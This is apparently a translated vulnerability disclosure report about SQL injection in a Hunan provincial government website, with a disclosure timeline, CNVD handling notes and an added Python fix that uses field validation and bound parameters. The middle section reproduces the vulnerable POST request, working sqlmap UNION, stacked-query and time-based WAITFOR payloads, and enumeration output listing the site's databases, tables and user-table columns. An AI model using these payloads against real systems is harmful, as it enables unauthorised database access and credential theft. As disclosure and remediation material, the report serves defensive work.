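2015-12-01: Details reported to the vendor; awaiting vendor handling
2015-12-04: Vendor confirmed; details disclosed to the vendor only
2015-12-14: Details disclosed to core white hats and experts in related fields
2015-12-24: Details disclosed to regular white hats
2016-01-03: Details disclosed to trainee white hats
2016-01-18: Details disclosed to the public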
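As per the title.
0x01 Vulnerability location
Hunan Administration for Industry and Commerce
http://**.**.**.**/
0x02 Vulnerability description
SQL injection vulnerability: leaks a large amount of database information
POST injection
0x03 Test request parameters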
POST /visit/peopleandgov/a/moreQuestionList?unitecodeIndex=430000 HTTP/1.1
Content-Length: 176
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://**.**.**.**:80/
Cookie: JSESSIONID=38F4E74C1FFC190A395DE54C5E743C7A; pgv_pvi=5850027008; pgv_si=s6229789696; pgv_heid=1448640932500.1448640932500.1448640997914.2
Host: **.**.**.**
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

hotkey=1&inHurdleid=-1&inPGid=0&isSearch=yes&pDateEnd=2015-10-16&pDateFrom=2015-10-16&repeatroleid=43000001&submit2=&title=Mr.
0x04 Testing tool
Testing with sqlmap is sufficient.
0x05
---
Place: POST
Parameter: inHurdleid
    Type: UNION query
    Title: Generic UNION query (NULL) - 14 columns
    Payload: hotkey=1&inHurdleid=-1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(101)+CHAR(99)+CHAR(101)+CHAR(113)+CHAR(121)+CHAR(88)+CHAR(78)+CHAR(74)+CHAR(117)+CHAR(119)+CHAR(116)+CHAR(86)+CHAR(114)+CHAR(73)+CHAR(113)+CHAR(101)+CHAR(108)+CHAR(97)+CHAR(113),NULL,NULL,NULL,NULL,NULL-- &inPGid=0&isSearch=yes&pDateEnd=2015-10-16&pDateFrom=2015-10-16&repeatroleid=43000001&submit2=&title=Mr.

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: hotkey=1&inHurdleid=-1'; WAITFOR DELAY '0:0:5'--&inPGid=0&isSearch=yes&pDateEnd=2015-10-16&pDateFrom=2015-10-16&repeatroleid=43000001&submit2=&title=Mr.

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: hotkey=1&inHurdleid=-1' WAITFOR DELAY '0:0:5'--&inPGid=0&isSearch=yes&pDateEnd=2015-10-16&pDateFrom=2015-10-16&repeatroleid=43000001&submit2=&title=Mr.
---
[02:44:12] [INFO] the back-end DBMS is Microsoft SQL Server
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2008
[02:44:12] [INFO] fetching database names
you provided a HTTP Cookie header value. The target URL provided its own cookies within the HTTP Set-Cookie header which intersect with yours. Do you want to merge them in futher requests? [Y/n] Y
available databases [10]:
[*] BackupDatabase
[*] EnterpriseInfo
[*] master
[*] MicroChatForHnaic
[*] model
[*] msdb
[*] NewHnaicNet
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
Database: NewHnaicNet
[48 tables]
+-----------------------------+
| PRODUCT_CATEGORY            |
| inputmark                   |
| sysdiagrams                 |
| tbattachment                |
| tbblacklist                 |
| tbboard1                    |
| tbcategory                  |
| tbcmzmmark                  |
| tbcollect                   |
| tbdatabase                  |
| tbddoslog                   |
| tbelecscreen                |
| tbfile                      |
| tbforeignpeoplequestion     |
| tbforeignpeoplequestiontype |
| tbforeignuser               |
| tbforeignuser3              |
| tbgovinforpublicity         |
| tbgroup                     |
| tbgroupboard                |
| tbgroupcategory             |
| tbhnaicknowledge            |
| tbhnaicknowledge_sub        |
| tbipunit                    |
| tbjoke                      |
| tbkeyword                   |
| tbleader                    |
| tbmessage                   |
| tbnetvoter                  |
| tbnetvoteroption            |
| tbnews                      |
| tboperatlog                 |
| tbphonebook                 |
| tbphoto                     |
| tbplacard                   |
| tbpublic_interaction_log    |
| tbrelationlink              |
| tbreply                     |
| tbspecial                   |
| tbtopic                     |
| tbunit                      |
| tbunitgroup                 |
| tbuser                      |
| tbvisitanddirectvideo       |
| tbvisitvideoquestion        |
| tbworksystem                |
| totalvoteforarea            |
| vtreeoperate                |
+-----------------------------+
0x06 Data
Database: NewHnaicNet
Table: tbuser
[294 entries]
| userid | groupid | usersex | username | userpswd | usersign | userociq | userfrom | usericon | useremail | usercharm | userstatus | userresult | authorunit | userregtime | userpostnum | userlogontime | userunitgroup | userexperience | usersafequestion |
Filter keywords.
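The following is an added example, not code from the report or from the affected site. It goes beyond keyword filtering: each form field from the reported request is checked against a typed allow-list, and the query uses bound parameters. The field types, the `question` table and the use of sqlite3 as a stand-in for SQL Server are assumptions.

```python
import re
import sqlite3
from urllib.parse import parse_qs

# Allow-list for the form fields in the report's request body. The types are
# assumptions inferred from the sample values shown on the page.
INT = re.compile(r"-?[0-9]{1,9}")
DATE = re.compile(r"[0-9]{4}-[0-9]{2}-[0-9]{2}")
SCHEMA = {
    "hotkey": INT, "inHurdleid": INT, "inPGid": INT, "repeatroleid": INT,
    "pDateFrom": DATE, "pDateEnd": DATE,
    "isSearch": re.compile(r"yes|no"),
    "submit2": re.compile(r""),
    "title": re.compile(r"[\w .-]{0,50}"),
}

def validate(body: str) -> dict:
    """Parse a urlencoded body; raise ValueError on unknown or ill-typed fields."""
    clean = {}
    for name, values in parse_qs(body, keep_blank_values=True,
                                 strict_parsing=True).items():
        rule = SCHEMA.get(name)
        if rule is None or len(values) != 1 or not rule.fullmatch(values[0]):
            raise ValueError(f"rejected field {name!r}")
        clean[name] = values[0]
    return clean

def make_db() -> sqlite3.Connection:
    """In-memory stand-in for the real SQL Server table (hypothetical schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE question (hurdle_id INTEGER, posted TEXT, title TEXT)")
    conn.execute("INSERT INTO question VALUES (-1, '2015-10-16', 'constructed row')")
    return conn

def search(conn: sqlite3.Connection, body: str) -> list:
    """Validate, then query with bound parameters so values never become SQL text."""
    p = validate(body)
    return conn.execute(
        "SELECT title FROM question WHERE hurdle_id = ? AND posted BETWEEN ? AND ?",
        (int(p["inHurdleid"]), p["pDateFrom"], p["pDateEnd"]),
    ).fetchall()

# Request body from the report, and the same body carrying the reported payload.
GOOD = ("hotkey=1&inHurdleid=-1&inPGid=0&isSearch=yes&pDateEnd=2015-10-16"
        "&pDateFrom=2015-10-16&repeatroleid=43000001&submit2=&title=Mr.")
BAD = GOOD.replace("inHurdleid=-1", "inHurdleid=-1' WAITFOR DELAY '0:0:5'--")
```

`search(make_db(), GOOD)` returns the constructed row, while `search(make_db(), BAD)` raises `ValueError` before any SQL is executed.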
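Severity: Medium
Vulnerability Rank: 10
Confirmed at: 2015-12-04 11:58
CNVD has confirmed the reported situation and has forwarded it through CNCERT to the Hunan branch center, which will coordinate follow-up handling with the organization that manages the website.
None yet.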